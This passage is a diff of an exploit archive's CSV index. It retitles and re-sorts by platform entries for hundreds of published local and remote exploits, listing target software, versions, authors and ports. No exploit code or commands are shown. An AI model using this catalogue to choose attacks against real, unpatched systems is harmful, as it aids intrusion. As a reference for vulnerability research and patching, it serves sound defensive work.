@ -6935,13 +6936,13 @@ id,file,description,date,author,platform,type,port
 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - Overwrite (SEH)",2012-05-01,blake,windows,local,0
 18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere - Insecure File Permissions Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0
 18826,platforms/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 - Stack Overflow",2012-05-03,cikumel,windows,local,0
-18861,platforms/windows/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,windows,local,0
+18861,platforms/win_x86/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,win_x86,local,0
 18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0
 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0
 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0
 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local,0
 18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0
-18917,platforms/linux/local/18917.txt,"Apache (Mod_Auth_OpenID) - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
+18917,platforms/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
 18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local,0
 18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
 18947,platforms/windows/local/18947.rb,"ispVM System - '.XCF' File Handling Overflow (Metasploit)",2012-05-29,Metasploit,windows,local,0
@ -7689,7 +7690,7 @@ id,file,description,date,author,platform,type,port
 22246,platforms/hp-ux/local/22246.c,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)",2003-02-12,"Last Stage of Delirium",hp-ux,local,0
 22247,platforms/hp-ux/local/22247.sh,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (2)",2003-02-20,watercloud,hp-ux,local,0
 22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unspecified Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local,0
-22265,platforms/linux/local/22265.pl,"cPanel 5.0 - Openwebmail Privilege Escalation",2003-02-19,deadbeat,linux,local,0
+22265,platforms/linux/local/22265.pl,"cPanel 5.0 - 'Openwebmail' Privilege Escalation",2003-02-19,deadbeat,linux,local,0
 22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",multiple,local,0
 22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0
 22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0
@ -7839,11 +7840,11 @@ id,file,description,date,author,platform,type,port
 23364,platforms/linux/local/23364.sh,"WMAPM 3.1 - Privilege Escalation",2003-11-08,"Knud Erik Hojgaard",linux,local,0
 23414,platforms/linux/local/23414.txt,"FVWM 2.4/2.5 - fvwm-menu-Directory Command Execution",2003-12-05,auto22238,linux,local,0
 23479,platforms/linux/local/23479.sh,"GNU Indent 2.2.9 - Local Heap Overflow",2003-12-26,"Pooh Hacking Squadron",linux,local,0
-23481,platforms/linux/local/23481.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0
+23481,platforms/linux/local/23481.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0
-23482,platforms/linux/local/23482.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0
+23482,platforms/linux/local/23482.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0
 23510,platforms/linux/local/23510.c,"XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0
 23511,platforms/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0
-23581,platforms/linux/local/23581.pl,"Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0
+23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0
 23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0
 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0
 23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0
@ -7880,7 +7881,7 @@ id,file,description,date,author,platform,type,port
 24064,platforms/unix/local/24064.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (3)",2004-04-25,"Secure Network Operations",unix,local,0
 24113,platforms/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation",2004-05-11,"Stefan Esser",bsd,local,0
 24123,platforms/linux/local/24123.sh,"WGet 1.x - Insecure File Creation Race Condition",2004-05-17,"Hugo Vazquez",linux,local,0
-24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0
+24141,platforms/linux/local/24141.txt,"cPanel 5 < 9 - Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0
 24171,platforms/windows/local/24171.c,"SmartStuff FoolProof Security Program 3.9.x - Administrative Password Recovery",2004-06-05,"Cyrillium Security",windows,local,0
 24173,platforms/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape functions Command Execution",2004-06-07,"Daniel Fabian",php,local,0
 24182,platforms/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0
@ -7909,7 +7910,7 @@ id,file,description,date,author,platform,type,port
 24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 - Insecure Temporary File Creation",2004-09-17,"Matt Johnston",osx,local,0
 24678,platforms/windows/local/24678.txt,"IBM DB2 - Universal Database Information Disclosure",2004-09-01,"Chris Anley",windows,local,0
 24682,platforms/windows/local/24682.c,"Microsoft Windows XP - Weak Default Configuration",2004-10-13,americanidiot,windows,local,0
-24694,platforms/linux/local/24694.c,"Apache 1.3.x (mod_include) - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0
+24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0
 24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Privilege Escalation (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
 24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
 24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0
@ -7927,7 +7928,7 @@ id,file,description,date,author,platform,type,port
 24923,platforms/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",multiple,local,0
 24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Privilege Escalation (Metasploit)",2013-04-08,Metasploit,linux,local,0
 24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0
-25039,platforms/aix/local/25039.txt,"IBM AIX 5.x - Diag Privilege Escalation Vulnerabilities",2004-12-20,cees-bart,aix,local,0
+25039,platforms/aix/local/25039.txt,"IBM AIX 5.x - 'Diag' Privilege Escalation",2004-12-20,cees-bart,aix,local,0
 25040,platforms/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module - Offset Memory Corruption",2004-12-20,"Stefano Di Paola",php,local,0
 25055,platforms/osx/local/25055.c,"Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow",2005-01-19,nemo@felinemenace.org,osx,local,0
 25080,platforms/linux/local/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local And Remote Vulnerabilities",2005-02-02,"Niels Heinen",linux,local,0
@ -8069,7 +8070,7 @@ id,file,description,date,author,platform,type,port
 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
 28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
-40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
+40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
 29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
@ -8542,7 +8543,7 @@ id,file,description,date,author,platform,type,port
 39214,platforms/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",linux,local,0
 39217,platforms/linux/local/39217.c,"Amanda 3.3.1 - Privilege Escalation",2016-01-11,"Hacker Fantastic",linux,local,0
 39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0
-39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - amstar Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local,0
+39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local,0
 39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0
 39277,platforms/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (1)",2016-01-19,"Perception Point Team",linux,local,0
 40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local,0
@ -8555,22 +8556,22 @@ id,file,description,date,author,platform,type,port
 40774,platforms/linux/local/40774.sh,"Nagios 4.2.2 - Privilege Escalation",2016-11-18,"Vincent Malguy",linux,local,0
 39340,platforms/android/local/39340.cpp,"Google Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0
 39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0
-39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0
+39432,platforms/win_x86/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,win_x86,local,0
-39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0
+39433,platforms/linux/local/39433.py,"Deepin Linux 15 - 'lastore-daemon' Privilege Escalation",2016-02-10,"King's Way",linux,local,0
 39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 - Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0
 39442,platforms/windows/local/39442.txt,"Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",windows,local,0
 39443,platforms/windows/local/39443.py,"Delta Industrial Automation DCISoft 1.12.09 - Stack Buffer Overflow",2016-02-15,LiquidWorm,windows,local,0
-39446,platforms/win_x86/local/39446.py,"Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
+39446,platforms/win_x86/local/39446.py,"Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
 39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0
 39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
 39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
 39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0
 39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass (Metasploit)",2016-03-03,Metasploit,windows,local,0
-39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
+39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
 39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0
 39535,platforms/linux/local/39535.sh,"Exim 4.84-3 - Privilege Escalation",2016-03-09,"Hacker Fantastic",linux,local,0
 39549,platforms/linux/local/39549.txt,"Exim < 4.86.2 - Privilege Escalation",2016-03-10,"Dawid Golunski",linux,local,0
-39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
+39574,platforms/win_x86/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",win_x86,local,0
 39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0
 39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Stack Overflow",2016-03-22,"Charley Celice",windows,local,0
 39595,platforms/multiple/local/39595.txt,"Apple Mac OSX / iOS - SUID Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
@ -8672,13 +8673,13 @@ id,file,description,date,author,platform,type,port
 40484,platforms/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
 40485,platforms/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
 40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
-40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
+40489,platforms/linux/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",linux,local,0
 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
 40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
 40497,platforms/windows/local/40497.txt,"sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0
-40564,platforms/windows/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",windows,local,0
+40564,platforms/win_x86/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",win_x86,local,0
 40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0
-40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
+40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
 40523,platforms/windows/local/40523.txt,"ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local,0
 40525,platforms/windows/local/40525.txt,"IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0
 40528,platforms/windows/local/40528.txt,"Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0
@ -8709,7 +8710,7 @@ id,file,description,date,author,platform,type,port
 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
 40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)",2016-10-19,"Phil Oester",linux,local,0
 40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
-40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
+40627,platforms/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local,0
 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
 40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0
@ -8717,13 +8718,13 @@ id,file,description,date,author,platform,type,port
 40655,platforms/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
 40660,platforms/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
 40669,platforms/macos/local/40669.txt,"Apple macOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",macos,local,0
-40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
+40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('mysql' System User) Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
 40686,platforms/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",multiple,local,0
 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
-40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
+40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
 40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)",2016-10-26,"Phil Oester",linux,local,0
-40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
+40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
 40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
@ -8740,7 +8741,7 @@ id,file,description,date,author,platform,type,port
 40861,platforms/windows/local/40861.txt,"Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
 40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
 40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
-40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
+40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
 40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
 40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
 40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
@ -8751,7 +8752,7 @@ id,file,description,date,author,platform,type,port
 40938,platforms/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)",2016-12-18,"Hacker Fantastic",linux,local,0
 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0
 40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0
-40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
+40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
 40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
@ -8769,9 +8770,10 @@ id,file,description,date,author,platform,type,port
 41152,platforms/linux/local/41152.txt,"GNU Screen 4.5.0 - Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",linux,local,0
 41154,platforms/linux/local/41154.sh,"GNU Screen 4.5.0 - Privilege Escalation",2017-01-25,"Xiphos Research Ltd",linux,local,0
 41158,platforms/linux/local/41158.txt,"Man-db 2.6.7.1 - Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local,0
-41171,platforms/linux/local/41171.txt,"Systemd 228 - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
+41171,platforms/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
 41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
 41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
 41196,platforms/linux/local/41196.txt,"Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)",2017-01-27,"Wolfgang Hotwagner",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -8812,7 +8814,7 @@ id,file,description,date,author,platform,type,port
 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114
 64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135
 66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
-67,platforms/multiple/remote/67.c,"Apache 1.3.x (mod_mylo) - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
+67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
 69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135
 70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135
 74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Command Execution",2003-08-03,Xpl017Elz,linux,remote,21
@ -8851,7 +8853,7 @@ id,file,description,date,author,platform,type,port
 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80
 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (WebServer)",2003-11-22,nesumin,windows,remote,0
 130,platforms/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0
-132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure",2003-12-06,m00,linux,remote,80
